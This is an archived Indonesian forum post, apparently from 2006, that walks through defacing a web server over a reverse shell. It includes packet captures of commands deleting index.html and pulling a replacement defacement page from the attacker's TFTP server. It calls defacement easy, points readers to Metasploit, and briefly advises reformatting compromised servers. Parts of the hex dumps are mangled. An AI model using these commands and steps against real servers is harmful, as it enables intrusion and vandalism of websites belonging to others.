11:02:39.079422 IP (tos 0x0, ttl 64, id 50860, offset 0, flags [DF], length: 58) 192.168.1.102.4321 > 192.168.1.101.1028: P [tcp sum ok] 51364367:51364385(18) ack 813323178 win 107200x0000: 4500 003a c6ac 4000 4006 eff5 c0a8 0166 E..:..@.@......f

0x0010: c0a8 0165 10e1 0404 030f c20f 307a 53aa ...e........0zS.0x0020: 5018 29e0 a0a4 0000 6465 6c20 2f46 2069 P.).....del./F.i0x0030: 6e64 6578 2e68 746d 6c0a ndex.html.

Dari paket yang ditampilkan dibawah ini kita bisa memverifikasi bahwa mesin penyerang 192.168.1.102 menggunakan perintah tftp ke web server target;

tftp –i 192.168.1.102 GET index.html

Paket kedua menampilkan web server target menerima tftp request ini kepada tftp server penyerang. Mengingat penyerang ini memiliki reverse shell sebagaimana yang ditampilkan dibawah ini:

<pre>11:02:48.698588 IP (tos 0x0, ttl 64, id 50878, offset 0, flags [DF],_length: 77) 192.168.1.102.4321 > 192.168.1.101.1028: P [tcp sum ok]_51364389:51364426(37) ack 813323812 win 10720

0x0000: 4500 004d c6be 4000 4006 efd0 c0a8 0166 E..M..@.@......f0x0010: c0a8 0165 10e1 0404 030f c225 307a 5624 ...e.......%0zV$0x0020: 5018 29e0 0c3c 0000 7466 7470 202d 6920 P.)..<..tftp.-i.0x0030: 3139 322e 3136 382e 312e 3130 3220 4745 192.168.1.102.GE0x0040: 5420 696e 6465 782e 6874 6d6c 0a T.index.html.

11:02:48.699161 IP (tos 0x0, ttl 128, id 117, offset 0, flags [DF],_length: 77) 192.168.1.101.1028 > 192.168.1.102.4321: P [tcp sum ok]_813323812:813323849(37) ack 51364426 win 17443

0x0000: 4500 004d 0075 4000 8006 761a c0a8 0165 E..M.u@...v....e0x0010: c0a8 0166 0404 10e1 307a 5624 030f c24a ...f....0zV$...J0x0020: 5018 4423 f1d3 0000 7466 7470 202d 6920 P.D#....tftp.-i.0x0030: 3139 322e 3136 382e 312e 3130 3220 4745 192.168.1.102.GE0x0040: 5420 696e 6465 782e 6874 6d6c 0a T.index.html.

</pre>

ada dua paket data yang telah melakukan konfirmasi tftp transfer yang diminta. Silakan lihat catatan transfer data halaman index.html anda sendiri ke web server korban.

<pre>11:02:48.834306 IP (tos 0x0, ttl 64, id 26457, offset 0, flags [DF],_length: 544) 192.168.1.102.1024 > 192.168.1.101.1030: [udp sum ok]_UDP, length: 516

0x0000: 4500 0220 6759 4000 4011 4d58 c0a8 0166 E...gY@.@.MX...f0x0010: c0a8 0165 0400 0406 020c 3502 0003 0001 ...e......5.....

0x0020: 3c21 444f 4354 5950 4520 6874 6d6c 2050 <!DOCTYPE.html.P0x0030: 5542 4c49 4320 222d 2f2f 5733 432f 2f44 UBLIC."-//W3C//D0x0040: 5444 2048 544d 4c20 342e 3031 2054 7261 TD.HTML.4.01.Tra0x0050: 6e73 6974 696f 6e61 6c2f 2f45 4e22 3e0a nsitional//EN">.0x0060: 3c68 746d 6c3e 0a3c 6865 6164 3e0a 2020 <html>.<head>...0x0070: 3c74 6974 6c65 3e69 6e64 6578 2e68 746d <title>index.htm0x0080: 6c32 3c2f 7469 746c 653e 0a3c 2f68 6561 l2</title>.</hea>.<body>.<h2><b0x00a0: 723e 0a3c 2f68 323e 0a3c 6831 3e3c 6272 r>.</h2>.<h1><br0x00b0: 3e0a 3c2f 6831 3e0a 3c68 313e 3c62 723e >.</h1>.<h1>

0x00c0: 0a3c 2f68 313e 0a3c 6831 3e59 6f75 2068 .</h1>.<h1>Situs.i0x00d0: 6176 6520 6a75 7374 2062 6565 6e20 6f77 ni.telah.di.defa0x00e0: 6e65 6420 6279 2061 6c74 2e64 6f6e 3c2f ce.oleh.NamaAnda</…</pre>

Kemudian perhatikan paket data terakhir ini menyatakan transfer halaman index.html telah berhasil dilakukan.

11:02:48.847478 IP (tos 0x0, ttl 128, id 121, offset 0, flags [DF],_length: 98) 192.168.1.101.1028 > 192.168.1.102.4321: P [tcp sum ok]_813323849:813323907(58) ack 51364426 win 17443

0x0000: 4500 0062 0079 4000 8006 7601 c0a8 0165 E..b.y@...v....e0x0010: c0a8 0166 0404 10e1 307a 5649 030f c24a ...f....0zVI...J0x0020: 5018 4423 fa01 0000 5472 616e 7366 6572 P.D#....Transfer0x0030: 2073 7563 6365 7373 6675 6c3a 2036 3736 .successful:.6760x0040: 2062 7974 6573 2069 6e20 3120 7365 636f .bytes.in.1.seco0x0050: 6e64 2c20 3637 3620 6279 7465 732f 730d nd,.676.bytes/s.0x0060: 0d0a ..

Deface telah dilakukan, dan itulah yang biasanya dilakukan oleh para defacer. Adakalanya para penyerang ini melakukan hal-hal yang lebih buruk lagi seperti menginstal rootkit, ftp server atau content yang tidak diinginkan. Saran saya, jika web server anda terdeface, maka yang harus anda lakukan adalah memformat hard disk anda karena kita tidak tahu apa yang telah dilakukan orang-orang ini pada web server anda. Sekedar mengganti halaman web yang terdeface tidaklah cukup.

Oh Iya, saya hampir lupa! Kira-kira seperti apa yach halaman web yang kita deface tadi? Coba anda perhatikan gambar dibawah ini:

nah ternyata mendeface web server itu relatif mudah bukan? Apa yang harus dilakukan adalah menemukan celah keamanan pada program web server seperti Apache.

Selanjutnya, melakukan coding untuk mengeksploitasinya. Hmm… orang-orang jenis inilah yang disebut hacker dengan kemampuan melakukan riset dan sangat berbakat. Orang-orang seperti HDM dan spoonm yang telah meluangkan waktunya guna mengembangkan Metasploit Framework agar kita dapat mempelajarinya.

Download Metasploit FrameWork Tool disini:http://www.metasploit.com/projects/Framework/

Sekian.dede2327-07-2006, 01:02 PMsry wa lupa sumber dr mana..alna ud lama jg hehe...masi ada di document gw....Alex10-08-2006, 03:39 AMsekarang metaspolit dah beta 1 versi 3.0 dan setelah dicoba sepertinya menjanjikanhttp://metasploit.com/projects/Framework/msf3/#downloadvBulletin® v3.8.3,